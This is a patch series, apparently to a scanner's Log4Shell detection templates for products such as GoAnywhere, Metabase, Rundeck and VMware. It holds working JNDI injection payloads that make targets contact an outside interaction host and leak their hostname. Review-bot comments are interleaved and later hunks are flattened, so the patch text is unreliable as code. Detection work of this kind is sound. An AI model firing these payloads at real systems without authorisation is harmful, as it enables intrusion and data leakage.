+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by md on 2022/10/04
diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
index 4bfa8ecaf4c..6688348f264 100644
--- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
+++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
@@ -19,6 +19,10 @@ info:
 verified: "true"
 tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -32,7 +36,7 @@ http:
 Origin: {{RootURL}}
 Referer: {{RootURL}}/goanywhere/auth/Login.xhtml

- formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
+ formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}

 cookie-reuse: true
 matchers-condition: and
@@ -45,7 +49,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: regex
@@ -60,10 +64,16 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output

+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by cs 2022/10/10
diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml
index 7c7aae81a39..982527b8fe9 100644
--- a/http/vulnerabilities/other/graylog-log4j.yaml
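Review bot: The rewritten form body in the second goanywhere hunk keeps `formPanel%3AloginGrid%3Avalue={{view}}}` with a third closing brace after `{{view}}`; the brace predates this change, but since the line is being rewritten anyway it should become `formPanel%3AloginGrid%3Avalue={{view}}` unless the extra character is deliberate. The `javax.faces.ViewState={{view}}` at the end of the same line shows the intended form.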
+++ b/http/vulnerabilities/other/graylog-log4j.yaml
@@ -19,6 +19,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -31,7 +35,7 @@ http:
 Origin: {{BaseURL}}
 Referer: {{BaseURL}}

- {"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
+ {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}

 matchers-condition: and
 matchers:
@@ -43,7 +47,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 - type: word
 part: header
@@ -55,10 +59,16 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output

+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by md on 2023/03/23

From 0c049e028e22996e24173b68efac33fa43df4761 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha
Date: Thu, 4 May 2023 00:16:17 +0530
Subject: [PATCH 06/10] updated templates

---
 .../vulnerabilities/other/metabase-log4j.yaml | 16 ++++++++++++---
 .../other/opennms-log4j-jndi-rce.yaml | 16 ++++++++++++---
 http/vulnerabilities/other/rundeck-log4j.yaml | 16 ++++++++++++---
 .../other/unifi-network-log4j-rce.yaml | 20 ++++++++++++++++---
 .../other/vmware-siterecovery-log4j-rce.yaml | 16 ++++++++++++---
 .../other/xenmobile-server-log4j.yaml | 16 ++++++++++++---
 .../springboot/springboot-log4j-rce.yaml | 16 ++++++++++++---
 .../vmware/vmware-hcx-log4j.yaml | 17 +++++++++++++---
 .../vmware/vmware-nsx-log4j.yaml | 16 ++++++++++++---
 .../vmware-operation-manager-log4j.yaml | 16 ++++++++++++---
 .../vmware/vrealize-operations-log4j-rce.yaml | 20 ++++++++++++++++---
 11 files changed, 152 insertions(+), 33 deletions(-)

diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml
index 094b3d33cb9..bd2d6791423 100644
--- a/http/vulnerabilities/other/metabase-log4j.yaml
+++ b/http/vulnerabilities/other/metabase-log4j.yaml
@@ -19,10 +19,14 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - method: GET
 path:
- - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
+ - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}"

 matchers-condition: and
 matchers:
@@ -34,7 +38,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 - type: word
 part: body
@@ -46,8 +50,14 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output

+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
index e37a71794fe..4e09dca5185 100644
--- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
@@ -21,6 +21,10 @@ info:
 verified: "true"
 tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -28,7 +32,7 @@ http:
 Referer: {{RootURL}}/opennms/login.jsp
 Content-Type: application/x-www-form-urlencoded

- j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
+ j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=

 matchers-condition: and
 matchers:
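Review bot: The marker between `${hostName}` and `{{interactsh-url}}` is `postdata` in the opennms hunk here (and in rundeck and unifi in this commit), while the POST-body injections updated earlier in the series (jamf-pro, cisco-unified, cisco-vmanage, mobileiron, goanywhere, graylog) and the header injections (ofbiz Cookie, cloudcenter Accept) all use `uri`. The group-2 extractor added alongside prints that token as the injection point, so those earlier templates will label a body or header injection as `uri` in scan output. Pick one label per actual location (for example `uri`, `postdata`, `header`) and apply it consistently across the series, and document it once in the `variables:` block with something like `# marker after ${hostName} names where the payload was placed: uri / postdata / header`.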
@@ -40,17 +44,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: kval
 kval:
 - interactsh_ip # Print remote interaction IP in output

+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by cs on 2022/10/23
diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml
index 73c8bd2bf34..f8650863dc4 100644
--- a/http/vulnerabilities/other/rundeck-log4j.yaml
+++ b/http/vulnerabilities/other/rundeck-log4j.yaml
@@ -19,6 +19,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -29,7 +33,7 @@ http:
 Connection: close
 Referer: {{BaseURL}}/user/login

- j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
+ j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin

 matchers-condition: and
 matchers:
@@ -41,7 +45,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 - type: word
 part: location
@@ -53,8 +57,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index 58c3871fa08..f61c9ef1b95 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -21,6 +21,10 @@ info: verified: "true" tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage - {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} + {"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true} matchers-condition: and matchers: 
@@ -42,13 +46,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/06/03 diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml index 3ea53743372..96d6c8b5b2d 100644 --- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml @@ -20,10 +20,14 @@ info: verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D' + - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D' matchers-condition: and matchers: 
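Review bot: The rewritten `path:` entry in the vmware-siterecovery hunk mixes a literal `$` with percent-encoded braces (`$%7Bjndi%3Aldap...`), whereas the line it replaces encoded the `$` as well (`%24%7B...`); both decode to the same lookup, but the mixed form is harder to read and to grep for across the repository. The injection label also stays `.uri.` although the later patch in this series switches to parameter names (`.url.`, `.username.`, `.search.`); `.error.` would follow that convention and tell the reader which query parameter fired: `- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}%7D.%24%7BhostName%7D.error.{{interactsh-url}}%7D'`.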
@@ -35,7 +39,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -47,8 +51,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index fca48fbc4f8..a90139cbd24 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -10,6 +10,10 @@ info: shodan-query: title:"XenMobile" tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -22,7 +26,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp - login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin + login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin matchers-condition: and matchers: 
@@ -34,7 +38,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -46,8 +50,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index f4d020ff725..4987e6d9cb8 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -18,12 +18,16 @@ info: cwe-id: CWE-502 tags: cve,cve2021,springboot,rce,oast,log4j,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}} matchers-condition: and matchers: 
@@ -35,17 +39,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/31 diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index 5e7fce43b9c..189fd688e06 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: { "authType": "password", - "username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}", + "username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}", "password": "admin" } 
@@ -45,16 +49,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/05 diff --git a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml index e64ea302b51..59ef04cc462 100644 --- a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/login.jsp - username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit= matchers-condition: and matchers: 
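Review bot: The context line `tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast` in vmware-nsx-log4j.yaml carries a `graylog` tag and no `vmware` or `nsx` tag, which looks carried over from another template; a `-tags vmware` run would skip this template and `-tags graylog` would pull it in. Since the hunk already edits the lines immediately below it, the fix fits in the same change: `tags: cve,cve2021,rce,jndi,log4j,vmware,nsx,kev,oast`. If the tag is deliberate, a short comment next to it would save the next maintainer the same question.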
@@ -41,7 +45,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: location @@ -53,8 +57,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml index 6f63c216142..23bdce65f6a 100644 --- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin - mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us + mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us matchers-condition: and matchers: 
@@ -44,7 +48,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -56,8 +60,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index e66de93131e..c4b09dcd706 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/ui/ - {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"} matchers-condition: and matchers: 
